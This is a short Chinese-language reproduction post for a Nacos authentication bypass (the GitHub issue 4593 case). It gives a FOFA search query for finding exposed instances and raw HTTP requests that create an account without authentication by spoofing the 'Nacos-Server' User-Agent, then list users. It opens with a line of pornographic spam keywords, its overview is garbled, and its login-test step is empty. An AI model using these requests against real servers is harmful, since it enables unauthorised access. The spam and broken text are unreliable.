日韩在线观看第一页,台湾成人在线视频。,欧性猛交XXXX乱大交,夜夜天天日日肏,日韩一级视频在线观看,欧美精品一区二区婷婷,一级片在线视频播放,91九色蝌蚪视频

Nacos 認證繞過

共 840字，需瀏覽 2分鐘

2021-02-05 12:21

Nacos 認證繞過

FOFA：title=nacos

一、漏洞概述

一個更易于構建云原生應用的動態(tài)服務發(fā)現(xiàn)、配置管理和服務管理平臺。

二、漏洞復現(xiàn)

2.1添加用戶

POST?/nacos/v1/auth/users?username=aaaa&password=bbbb?HTTP/1.1
Host:?192.168.1.2
User-Agent:?Nacos-Server
Accept:?text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language:?zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding:?gzip,?deflate
DNT:?1
Connection:?close
Content-Type:?application/x-www-form-urlencoded
Content-Length:?0

2.2添加成功

GET?/nacos/v1/auth/users?pageNo=1&pageSize=100?HTTP/1.1
Host:?192.168.1.2
User-Agent:?Nacos-Server
Accept:?text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language:?zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding:?gzip,?deflate
DNT:?1
Connection:?close

2.3登錄測試

參考：

https://github.com/alibaba/nacos/issues/4593
https://www.t00ls.net/articles-59364.html

- END -

點贊

評論

舉報

Nacos 認證繞過

Nacos 認證繞過

一、漏洞概述

二、漏洞復現(xiàn)

2.1添加用戶

2.2添加成功

2.3登錄測試

一、漏洞概述

二、漏洞復現(xiàn)